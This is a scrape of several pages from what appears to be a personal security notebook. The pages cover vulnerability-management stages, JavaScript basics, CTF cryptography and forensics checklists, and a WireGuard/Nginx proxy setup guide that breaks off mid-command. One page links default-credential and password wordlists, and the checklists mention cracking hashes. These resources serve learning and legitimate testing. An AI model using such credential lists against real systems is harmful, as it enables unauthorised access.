Analysis](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#geographic-and-demographic-analysis) * [Combined Queries](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet#combined-queries) --- # Vulnerability Management Lifecycle | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle.md) . The VM Lifecycle represents the process and series of critical stages to identify and remediate vulnerabilities/weakness to attacks and exploitation of discovered findings. [](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#discovery) Discovery ------------------------------------------------------------------------------------------------------------------------------------- Detect and interrogate system assets * Devices, platforms, applications Identify all assets * Identify assets that need to be monitored * The intent is to ensure no vulnerable devices are overlooked [](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#prioritize-assets) Prioritize Assets ----------------------------------------------------------------------------------------------------------------------------------------------------- Determines the priority of discovered assets * What assets are most business-critical? * What assets require immediate attention? * Helps focus resources > Patching all assets at once is likely not feasible. Ensure to collaborate with asset owners and stakeholders to determine asset priorities [](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#assess) Assess ------------------------------------------------------------------------------------------------------------------------------- Determines if a vulnerability exists in the system * Compares assets to known vulnerabilities * Determine Risk score (CVSS, VRT, etc) [](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#reporting) Reporting ------------------------------------------------------------------------------------------------------------------------------------- Presents assets and vulnerabilities in a form to view findings * Compile discovery with identified vulnerabilities * Usually categorized by priority, location, etc * Tailor reports for various audiences [](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#remediate) Remediate ------------------------------------------------------------------------------------------------------------------------------------- Takes action on a vulnerability * Apply patches * Initiate compensating controls * Accept the vulnerability/risk [](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#verify) Verify ------------------------------------------------------------------------------------------------------------------------------- Verifies that a remediation was successful or effective * Was vulnerability resolved? * Is further action needed? [](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#vm-lifecycle-challenges) VM Lifecycle Challenges ----------------------------------------------------------------------------------------------------------------------------------------------------------------- Incomplete asset information - Effective discovery requires both **asset identification** and the information about the **contents** of each asset Incomplete asset lists - Out-of-date asset lists and mixed data sources can prevent discovery from providing complete asset accountability for a thorough risk evaluation Overwhelming scan data - Prioritization helps target efforts for the most critical assets from the most serious threats Organizational communication - Frequent communication, reports, system dashboards, and notifications help keep teams informed for required patching/updates Vulnerability Identification - Vulnerability data must be up to data and relevant from authoritative sources Timely Remediation - Efforts must be timely, organized, and effective with specific assignments and accountability Process Tracking - Verification helps assure that remediation is successful with no new vulnerabilities exposed [PreviousGovernance, Risk, Compliance](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance) [NextCheatsheets](https://martian1337.gitbook.io/notes/notes/cheatsheets) Last updated 1 year ago * [Discovery](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#discovery) * [Prioritize Assets](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#prioritize-assets) * [Assess](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#assess) * [Reporting](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#reporting) * [Remediate](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#remediate) * [Verify](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#verify) * [VM Lifecycle Challenges](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle#vm-lifecycle-challenges) --- # Wordlists | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/wordlists.md) . ### [](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/wordlists#wordlists-and-passwords) Wordlists and Passwords Password Databases/Lists [Seclists from @danielmiessler](https://github.com/danielmiessler/SecLists) [Default Creds Cheat Sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet) [CIRT.net (default passwords)](https://cirt.net/passwords) [Default-password.info](https://default-password.info/) [Data Recovery (default passwords)](https://datarecovery.com/rd/default-passwords/) [Skullsecurity Password collection](https://wiki.skullsecurity.org/index.php?title=Passwords) [Trickest Wordlists](https://github.com/trickest/wordlists) #### [](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/wordlists#web-fuzzing) Web Fuzzing [OnelistForall](https://github.com/six2dez/OneListForAll) - AKA Rockyou for web ! [FuzzDB](https://github.com/fuzzdb-project/fuzzdb) [Asset Note](https://wordlists.assetnote.io/) [PreviousCloud Pentesting](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/cloud-pentesting) [NextSocial Engineering](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/social-engineering) Last updated 1 year ago --- # JavaScript | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript.md) . The console is part of the web browser and allows you to log messages, run JavaScript code, and see errors and warnings. \\ ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#js-basics) JS Basics Example function used to generate output to the console: Copy console.log("Hello Humans!"); Enclosed text in quotes: Copy console.log("I love free cyber training"); Quotes are not needed for numbers: Copy console.log(1337); The console.log() function can be used as many times as needed: Copy console.log("Hello Humans!"); console.log("Take me to your leader"); ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#javascript-in-html) JavaScript in HTML You can add JavaScript code in an HTML document using the Alert Box display messages with the alert() function ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#comments) Comments Comments are used to describe code and other information A single-line comment starts with `//` Multi-line comments start with `/*` and end with `*/` making everything in between a comment ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#logic) Logic JavaScript uses the basic programming operators for math such as `+`. `-`, `/`, `*`, including `(`, and `)`, for order of operations. Increment operator `++` adds 1 to a variable Decrement operator `--` subtracts 1 from a variable Combining Arithmetic operators with increment/decrement operators looks like the sample below: ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#variables) Variables * variable names must begin with a letter, an underscore `_` or a dollar sign `$` * variable names cannot contain spaces * variable names can only contain letters, numbers, underscores, or dollar signs. * variable names are case-sensitive, which means that, for example, Name and name variables are different Create a variable (initialize) in JS with `let` or `var`: OR Note: the use of let is recommended instead of var when decalring variables Remembering the definition of variable, remember that they can change on they fly: ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#constants) Constants Constants must have a value when declared and they cannot change their value. The `typeof` operator checks the value to its right and _returns_, or passes back, a string of the data type. [](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#conditional-ternary-operator) Conditional (Ternary) operator --------------------------------------------------------------------------------------------------------------------------------------------- Conditional, or ternary, operators assign a value to a variable, based on some condition. This operator is frequently used as an alternative to an `if else` statement. This is what the syntax would look like: It takes three operands: a condition followed by a question mark `?`, then an expression to execute if the condition is true followed by a colon `:`, and finally, the expression to execute if the condition is false. For this example below, if the total amount is equal to or above 300 it will be discounted by 15%. [](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#loops) Loops --------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#for-loop) For Loop The `for` loop has the following syntax: The initializer is a variable, which increments the number of times the loop has run. The condition is used to stop the loop. The final expression is run each time after the loop's code has run. It is usually used to increment the variable used in the condition. Each run of the loop is called an **iteration**. Here is an example of a `for` loop outputting the number 1 to 10: The loop creates a variable called `i` and initializes it to 1. Then, after each iteration, it increments the `i` variable by 1. The loop stops when `i` reaches 11, breaking the condition. Here is another loop in which each time the player shoots, the number of bullets should be decreased by 1. ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#while-loop) While Loop [PreviousSecure Coding Practices Checklist](https://martian1337.gitbook.io/notes/notes/coding-programming/secure-coding-practices-checklist) [NextPython](https://martian1337.gitbook.io/notes/notes/coding-programming/python) Last updated 1 year ago * [JS Basics](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#js-basics) * [JavaScript in HTML](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#javascript-in-html) * [Comments](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#comments) * [Logic](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#logic) * [Variables](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#variables) * [Constants](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#constants) * [Conditional (Ternary) operator](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#conditional-ternary-operator) * [Loops](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#loops) * [For Loop](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#for-loop) * [While Loop](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript#while-loop) Copy Copy //I wonder if I can display two messages in the same script tag /* The code below should suffice for testing */ Copy /* 30 days 1 day = 24 hours 1 hour = 60 minutes 1 minute = 60 seconds */ //Aproximately how many seconds are in a year? console.log(60*60*24*30); Copy let count = 0; count++; console.log(count); Copy let score = 100; score--; score--; console.log(score); Copy let x = 8; x++; x/=3; console.log(x); //Output should equal 3 Copy let name; name = "Martian"; Copy let name = "Martian"; let number = 1337 Copy let num = 7331; num = 1337; //num = 7; console.log(num); Copy const cyberpsace = 'green'; console.log(color); color = 'blue'; //confirm this will not work Copy const unknown1 = 'foo'; console.log(typeof unknown1); // Output: string const unknown2 = 10; console.log(typeof unknown2); // Output: number const unknown3 = true; console.log(typeof unknown3); // Output: boolean Copy variable = (condition) ? value1: value2 Copy let lightyears = 42; let allowedDistance = (lightyears < 5) ? "Too close to Earth": "Welcome to the void"; console.log(allowedDistance); Copy let cost = 400; cost = (cost >= 300) ? cost * 0.85 : cost; console.log(cost); Copy for (initializer; condition; final-expression) { // code to run } Copy for (let i = 1; i <= 10; i++) { console.log(i); } Copy for(let i=5; i>=0; i-=1) { console.log(`Bullets: ${i}`); } --- # Cryptography Checklist | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist.md) . ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#initial-assessment) **Initial Assessment:** * Identify the type of cryptography used (symmetric, asymmetric, hashing, etc.). * Look for any hints that might indicate a specific cipher or algorithm. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#common-ciphers-and-encodings) **Common Ciphers and Encodings:** * Check for basic encoding schemes (Base64, Hex, ASCII, etc.). * Test for simple ciphers (Caesar, ROT13, Vigenère, etc.). * Use online tools or scripts to quickly test these possibilities. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#symmetric-key-cryptography) **Symmetric Key Cryptography:** * If a key is provided or can be guessed, try decrypting with common algorithms (AES, DES, etc.). * Check for weak keys or implementation flaws. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#asymmetric-key-cryptography) **Asymmetric Key Cryptography:** * Analyze any provided keys or ciphertexts. * Check for weak keys, small key sizes, or common vulnerabilities like small prime numbers in RSA. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#cryptographic-protocols) **Cryptographic Protocols:** * Understand the cryptographic protocol or scheme being used (if any). * Look for protocol-specific vulnerabilities or misconfigurations. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#hash-functions) **Hash Functions:** * Identify the hash function used. * Attempt to crack hashes using rainbow tables or brute force, if feasible. * Look for vulnerabilities like hash collisions. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#cryptanalysis-techniques) **Cryptanalysis Techniques:** * Apply classical cryptanalysis techniques (frequency analysis, known plaintext, etc.). * Look for patterns or statistical anomalies in ciphertext. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#modern-cryptography-attacks) **Modern Cryptography Attacks:** * Consider side-channel attacks, padding oracle attacks, etc., if the scenario suggests their applicability. * Research any recent vulnerabilities in cryptographic algorithms or implementations. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#scripting-and-automation) **Scripting and Automation:** * Write or use existing scripts to automate decryption or analysis tasks. * Use tools like Python with libraries (e.g., pycrypto, hashlib) for custom cryptanalysis. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#challenge-context) **Challenge Context:** * Consider the context of the challenge for any thematic hints or clues. * Sometimes the key or a hint to the solution is hidden in the challenge description or storyline. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#validation-of-findings) **Validation of Findings:** * Test your findings against the challenge. * It's common in CTFs for the output to be a flag in a specific format (e.g., `flag{...}`). ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#research-and-learning) **Research and Learning:** * If stuck, research cryptographic methods and past CTF write-ups for ideas. * Cryptography challenges often require learning new concepts and techniques. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#documentation) **Documentation:** * Keep notes on your process and solutions. * Documenting your approach can be invaluable for learning and for future challenges. [PreviousBinary Exploitation](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation) [NextCertifications](https://martian1337.gitbook.io/notes/notes/certifications) Last updated 1 year ago * [Initial Assessment:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#initial-assessment) * [Common Ciphers and Encodings:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#common-ciphers-and-encodings) * [Symmetric Key Cryptography:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#symmetric-key-cryptography) * [Asymmetric Key Cryptography:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#asymmetric-key-cryptography) * [Cryptographic Protocols:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#cryptographic-protocols) * [Hash Functions:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#hash-functions) * [Cryptanalysis Techniques:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#cryptanalysis-techniques) * [Modern Cryptography Attacks:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#modern-cryptography-attacks) * [Scripting and Automation:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#scripting-and-automation) * [Challenge Context:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#challenge-context) * [Validation of Findings:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#validation-of-findings) * [Research and Learning:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#research-and-learning) * [Documentation:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist#documentation) --- # Forensics Checklist | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist.md) . ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#initial-setup) **Initial Setup** * Prepare a forensic workstation with necessary tools (Autopsy, Wireshark, Volatility, binwalk, Foremost, FlareVM, etc.). * Ensure you have a write blocker if you're dealing with physical drives. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#evidence-acquisition) **Evidence Acquisition** * Obtain a copy of the digital evidence (disk images, memory dumps, network captures, etc.). * Useful tools by Eric Zimmerman: [https://ericzimmerman.github.io/#!index.md](https://ericzimmerman.github.io/#!index.md) * MFT analysis: [https://github.com/kacos2000/MFT\_Browser](https://github.com/kacos2000/MFT_Browser) * Verify the integrity of the evidence (using hash values). ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#evidence-analysis) Evidence Analysis * **Disk Image Analysis:** * Analyze disk images with tools like Autopsy or Sleuth Kit. * Look for deleted files, hidden partitions, and file system artifacts. * **Memory Dump Analysis:** * Use tools like Volatility or Rekall for memory analysis. * Search for suspicious processes, network connections, and memory strings. * **Network Traffic Analysis:** * Analyze network captures with tools like Wireshark or NetworkMiner. * Look for anomalies, data exfiltration, or suspicious connections. * **Log Analysis:** * Examine system and application logs for signs of tampering or malicious activity. * **File Analysis:** * Use file analysis tools (binwalk, Foremost) to extract embedded or hidden content. * Inspect file metadata for clues (e.g., EXIF data in images). * **Email Analysis:** * Examine email headers and content for phishing indicators or spoofed emails. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#timeline-analysis) **Timeline Analysis** * Create a timeline of events to understand the sequence of activities. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#data-recovery) **Data Recovery:** * Attempt to recover any deleted or corrupted data. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#artifact-correlation) **Artifact Correlation:** * Correlate data from different sources (logs, files, images) to build a comprehensive view. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#scripting-and-automation) **Scripting and Automation:** * Write scripts to automate analysis tasks or parse through large datasets. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#steganography-analysis-if-applicable) **Steganography Analysis (if applicable):** * Use steganography tools (Steghide, zsteg, etc.) to check for hidden data in images or audio files. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#cryptanalysis-if-applicable) **Cryptanalysis (if applicable):** * Identify and attempt to break any cryptographic elements encountered. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#malware-analysis-if-applicable) **Malware Analysis (if applicable):** * Analyze suspicious files for malware characteristics using sandboxes or static/dynamic analysis tools. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#challenge-specific-analysis) Challenge-Specific Analysis * Each CTF challenge might have specific requirements or hints. Tailor your approach accordingly. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#reporting-if-applicable) Reporting (if applicable) * Document your findings, including the methods used and the interpretation of the data. * Prepare a detailed report or a write-up of your analysis. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#cleanup) Cleanup * Securely erase any copies of sensitive data once the analysis is complete. [PreviousMobile Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist) [NextBinary Exploitation](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation) Last updated 1 year ago * [Initial Setup](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#initial-setup) * [Evidence Acquisition](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#evidence-acquisition) * [Evidence Analysis](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#evidence-analysis) * [Timeline Analysis](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#timeline-analysis) * [Data Recovery:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#data-recovery) * [Artifact Correlation:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#artifact-correlation) * [Scripting and Automation:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#scripting-and-automation) * [Steganography Analysis (if applicable):](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#steganography-analysis-if-applicable) * [Cryptanalysis (if applicable):](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#cryptanalysis-if-applicable) * [Malware Analysis (if applicable):](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#malware-analysis-if-applicable) * [Challenge-Specific Analysis](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#challenge-specific-analysis) * [Reporting (if applicable)](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#reporting-if-applicable) * [Cleanup](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist#cleanup) --- # Two-VPS Private Proxy Architecture: Nginx Reverse Proxy Over Wireguard VPN | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn.md) . ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-1-overview) Overview * **Proxy VPS:** Public VPS running Nginx reverse proxy with its own public IP. * **Backend VPS:** Origin VPS running your service (e.g., Gitea, Forgejo), completely private. * **Wireguard VPN:** Encrypted private tunnel connecting Proxy VPS and Backend VPS. * **Traffic flow:** Client → Proxy VPS → Wireguard VPN → Backend VPS (service). * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-2-prerequisites) Prerequisites * Two Linux VPS servers (Ubuntu recommended). * A domain or subdomain for your service. * Basic Linux command line knowledge. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-3-generate-wireguard-keys-on-both-vpses) 1\. Generate Wireguard Keys on Both VPSes Copy wg genkey | tee privatekey | wg pubkey > publickey chmod 600 privatekey publickey * `privatekey` holds your private key. * `publickey` holds your public key. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-4-configure-wireguard-on-proxy-vps) 2\. Configure Wireguard on Proxy VPS Create `/etc/wireguard/wg0.conf`: Enable and start: * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-5-configure-wireguard-on-backend-vps) 3\. Configure Wireguard on Backend VPS Create `/etc/wireguard/wg0.conf`: Enable and start: * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-6-ensure-backend-app-port-is-not-publicly-exposed) 4\. Ensure Backend App Port Is Not Publicly Exposed #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-4.1-bind-the-service-to-the-vpn-ip) 4.1 Bind the Service to the VPN IP Configure your app (Gitea, forgejo, etc) to listen only on VPN IP `10.200.200.2`. Example for Gitea (`app.ini`): This restricts the app to accept connections only over the secure VPN. #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-4.2-firewall-configuration-on-backend-vps) 4.2 Firewall Configuration on Backend VPS Block all incoming traffic except from Proxy VPS VPN IP on the service port (3000): Only the Proxy VPS can access your backend service port. #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-4.3-verify-port-binding-and-traffic-restrictions) 4.3 Verify Port Binding and Traffic Restrictions Check that service is listening correctly: Expected output shows service bound to `10.200.200.2:3000` or `127.0.0.1:3000`, NOT all interfaces (`0.0.0.0`). #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-4.4-optional-nat-port-forwarding-on-proxy-vps) 4.4 Optional: NAT Port Forwarding on Proxy VPS Alternatively or additionally, on Proxy VPS use iptables to forward incoming public port 443 traffic to backend VPN IP + port 3000: Add to Wireguard config `/etc/wireguard/wg0.conf` on Proxy VPS for automation: * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-7-configure-nginx-on-proxy-vps) 5\. Configure Nginx on Proxy VPS Install Nginx and configure `/etc/nginx/sites-available/gitproxy`: Enable site and reload Nginx: * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-8-configure-dns-and-ssl) 6\. Configure DNS and SSL * Point your domain DNS A record to Proxy VPS public IP. * Obtain SSL with Certbot on Proxy VPS: * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-9-test-your-setup) 7\. Test Your Setup Visit: Access your service securely via the Proxy VPS. Origin VPS IP remains hidden. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#summary-table) Summary Table Step Purpose Wireguard key gen Secure keys for VPN connection Wireguard VPN config Encrypted tunnel between VPSes Bind app to VPN IP Restrict app accessibility Backend firewall rules Allow service port only from Proxy VPN IP Nginx reverse proxy Proxy requests securely DNS and SSL setup Secure domain pointing and encryption [PreviousHosting Gitea & Forgejo with Docker, Nginx, and Cloudflare Proxy](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy) [NextMonero Mining Guide](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide) Last updated 8 months ago * [Overview](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-1-overview) * [Prerequisites](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-2-prerequisites) * [1\. Generate Wireguard Keys on Both VPSes](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-3-generate-wireguard-keys-on-both-vpses) * [2\. Configure Wireguard on Proxy VPS](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-4-configure-wireguard-on-proxy-vps) * [3\. Configure Wireguard on Backend VPS](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-5-configure-wireguard-on-backend-vps) * [4\. Ensure Backend App Port Is Not Publicly Exposed](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-6-ensure-backend-app-port-is-not-publicly-exposed) * [5\. Configure Nginx on Proxy VPS](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-7-configure-nginx-on-proxy-vps) * [6\. Configure DNS and SSL](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-8-configure-dns-and-ssl) * [7\. Test Your Setup](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#id-9-test-your-setup) * [Summary Table](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn#summary-table) Copy [Interface] PrivateKey = Address = 10.200.200.1/24 ListenPort = 51820 [Peer] PublicKey = AllowedIPs = 10.200.200.2/32 Copy sudo wg-quick up wg0 sudo systemctl enable wg-quick@wg0 Copy [Interface] PrivateKey = Address = 10.200.200.2/24 [Peer] PublicKey = Endpoint = :51820 AllowedIPs = 0.0.0.0/0 PersistentKeepalive = 25 Copy sudo wg-quick up wg0 sudo systemctl enable wg-quick@wg0 Copy [server] HTTP_ADDR = 10.200.200.2 HTTP_PORT = 3000 Copy sudo ufw default deny incoming sudo ufw allow from 10.200.200.1 to any port 3000 proto tcp sudo ufw allow 22/tcp # SSH access sudo ufw enable sudo ufw reload Copy sudo ss -tuln | grep 3000 Copy sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 